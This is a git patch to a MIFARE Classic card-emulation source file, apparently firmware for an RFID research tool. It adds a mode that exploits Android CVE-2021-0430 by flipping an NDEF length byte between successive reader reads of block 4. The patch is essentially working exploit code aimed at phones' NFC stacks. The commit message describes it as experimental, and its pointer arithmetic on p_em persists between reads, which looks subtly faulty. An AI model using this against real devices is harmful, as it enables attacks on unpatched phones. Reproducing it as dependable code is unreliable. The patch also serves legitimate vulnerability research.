From 218dbafdff0407c9831cfc5f6e6c5cb0fa3b5ebb Mon Sep 17 00:00:00 2001
From: iceman1001 <iceman@iuse.se>
Date: Mon, 3 May 2021 21:47:12 +0200
Subject: [PATCH] fiddling with simulating ndef messages on MFC and android

---
 armsrc/mifaresim.c | 45 ++++++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 44 insertions(+), 1 deletion(-)

diff --git a/armsrc/mifaresim.c b/armsrc/mifaresim.c
index e6810f8e9..ddfb10105 100644
--- a/armsrc/mifaresim.c
+++ b/armsrc/mifaresim.c
@@ -519,6 +519,9 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
     LED_D_ON();
     ResetSspClk();
 
+    uint8_t *p_em = BigBuf_get_EM_addr();
+    uint8_t cve_flipper = 0;
+
     int counter = 0;
     bool finished = false;
     bool button_pushed = BUTTON_PRESS();
@@ -561,6 +564,10 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 
         if (res == 2) { //Field is off!
             //FpgaDisableTracing();
+            if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
+                p_em[1] = 0x21;
+                cve_flipper = 0;
+            }
             LEDsoff();
             cardSTATE = MFEMUL_NOFIELD;
             if (DBGLEVEL >= DBG_EXTENDED)
@@ -594,6 +601,11 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
             LED_B_OFF();
             LED_C_OFF();
             cardSTATE = MFEMUL_SELECT;
+
+            if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
+                p_em[1] = 0x21;
+                cve_flipper = 0;
+            }
             continue;
         }
 
@@ -849,8 +861,39 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
                 // case MFEMUL_WORK => CMD READ block
                 if (receivedCmd_len == 4 && receivedCmd_dec[0] == ISO14443A_CMD_READBLOCK) {
                     blockNo = receivedCmd_dec[1];
-                    if (DBGLEVEL >= DBG_EXTENDED) Dbprintf("[MFEMUL_WORK] Reader reading block %d (0x%02x)", blockNo, blockNo);
+                    if (DBGLEVEL >= DBG_EXTENDED)
+                        Dbprintf("[MFEMUL_WORK] Reader reading block %d (0x%02x)", blockNo, blockNo);
+
+                    // android CVE 2021_0430
+                    // Simulate a MFC 1K,  with a NDEF message.
+                    // these values uses the standard LIBNFC NDEF message
+                    //
+                    // In short,  first a value read of block 4,
+                    // update the length byte before second read of block 4.
+                    // on iphone etc there might even be 3 reads of block 4.
+                    // fiddling with when to flip the byte or not,  has different effects
+                    if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
+
+                        // first block
+                        if (blockNo == 4) {
+
+                            p_em += blockNo * 16;
+                            // TLV in NDEF, flip length between 
+                            //  4 | 03 21 D1 02 1C 53 70 91 01 09 54 02 65 6E 4C 69
+                            // 0xFF means long length
+                            // 0xFE mean max short length
+
+                            // We could also have a go at message len byte at p_em[4]...
+                            if (p_em[1] == 0x21 && cve_flipper == 1) {
+                                p_em[1] = 0xFE;
+                            } else {
+                                cve_flipper++;
+                            }
+                        }
+                    }
+
                     emlGetMem(response, blockNo, 1);
+
                     if (DBGLEVEL >= DBG_EXTENDED)  {
                         Dbprintf("[MFEMUL_WORK - ISO14443A_CMD_READBLOCK] Data Block[%d]: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x", blockNo,
                                  response[0], response[1], response[2], response[3],  response[4],  response[5],  response[6],